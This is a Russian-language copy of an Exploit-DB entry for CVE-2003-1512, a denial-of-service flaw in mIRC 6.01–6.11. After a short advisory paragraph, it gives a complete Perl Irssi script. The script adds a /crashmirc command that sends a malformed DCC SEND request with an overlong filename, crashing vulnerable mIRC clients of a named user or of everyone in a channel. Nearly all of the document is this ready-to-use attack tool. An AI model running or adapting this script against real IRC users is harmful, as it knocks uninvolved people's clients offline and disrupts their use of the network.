- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 23241
- Проверка EDB
-
- Пройдено
- Автор
- DARKANGEL
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2003-1512
- Дата публикации
- 2003-10-13
Код:
source: https://www.securityfocus.com/bid/8818/info
A vulnerability has been reported to exist in the mIRC client that may allow a remote attacker to crash a vulnerable mIRC client. The condition is most likely present due to insufficient boundary checking performed on 'DCC SEND' requests.
It has been reported that when received, a malicious 'DDC SEND' request can trigger a fatal error and cause an affected mIRC client to crash.
#!/usr/bin/perl
# mIRC v.6.01-6.11 DCC bug crash script
# usage:
# /crashmirc <#chan> crashes every user with vulnerable mIRC client on <#chan>
# /crashmirc <nick> crashes <nick> with vulnerable mIRC client
#
# v0.4: fixed bug with dcc send command, thx to DarkAngel
use Irssi;
use strict;
use vars qw($VERSION %IRSSI);
$VERSION = "0.4";
%IRSSI = (
authors => 'Philipp Sieweck, DarkAngel',
description => 'Crashs another mIRC client using the ' .
'dcc-filename-too-long bug',
license => 'GPL',
contact => '[email protected] (PGP UserID: 4496DDC2), ' .
'darkangel(at)hysteria(dot)sk',
version => $VERSION
);
#sub generate_random_string($)
#{
# my $string_length = shift;
# my $str = '';
# my $strchr = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOQRSTUVWXYZ';
#
# for (my $i = 0; $i < $string_length; $i++) {
# my $ri = int(rand(length($strchr)));
# $str .= substr($strchr, $ri, 1);
# }
#
# return $str;
#}
sub generate_crash_string($)
{
my $string_length = shift;
my $str;
for (my $i = 0; $i < $string_length/2; $i++) {
$str .= 'a ';
}
$str .= 'a';
return $str;
}
sub create_dcc_send_message($$$$$)
{
my ($nick, $ip, $filename, $filesize, $port) = @_;
my @ip_chunks = $ip =~ /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;
my $cip = $ip_chunks[0]*256*256*256
+ $ip_chunks[1]*256*256
+ $ip_chunks[2]*256
+ $ip_chunks[3];
return "PRIVMSG $nick :\x01DCC SEND $filename $cip $port $filesize\x01";
}
sub crash_mirc($$$)
{
my ($data, $server, $witem) = @_;
unless ($server) {
print CLIENTCRAP '%W[%R!%W]%n Not connected to Server!';
return;
}
$data =~ /^(\S+)/;
my $nick = $1;
unless ($nick) {
print CLIENTCRAP '%W[%R!%W]%n Syntax: /crashmirc <#chan>|<nick>';
return;
}
my $port = Irssi::settings_get_int('mirc_dcc_crash_dccport');
my $filesize = Irssi::settings_get_int('mirc_dcc_crash_filesize');
my $sender_ip = Irssi::settings_get_str('mirc_dcc_crash_sender_ip');
my $filename_length = Irssi::settings_get_int('mirc_dcc_crash_filename_length');
my $filename_suffix = Irssi::settings_get_str('mirc_dcc_crash_filename_suffix');
print CLIENTCRAP '%W[%B-%W]%n Sending DCC CrashMsg to %W' . $nick . '%n';
my $raw_str = &create_dcc_send_message($nick, $sender_ip,
# &generate_random_string($filename_length).$filename_suffix,
'"'.&generate_crash_string($filename_length).$filename_suffix.'"',
$filesize, $port);
$server->send_raw($raw_str);
}
Irssi::settings_add_int('mirc_dcc_crash', 'mirc_dcc_crash_dccport', 34234);
Irssi::settings_add_int('mirc_dcc_crash', 'mirc_dcc_crash_filesize', 32234234);
Irssi::settings_add_str('mirc_dcc_crash', 'mirc_dcc_crash_sender_ip', '80.34.2.234');
Irssi::settings_add_str('mirc_dcc_crash', 'mirc_dcc_crash_filename_suffix', '');
Irssi::settings_add_int('mirc_dcc_crash', 'mirc_dcc_crash_filename_length', 400);
Irssi::command_bind('crashmirc', 'crash_mirc');
- Источник
- www.exploit-db.com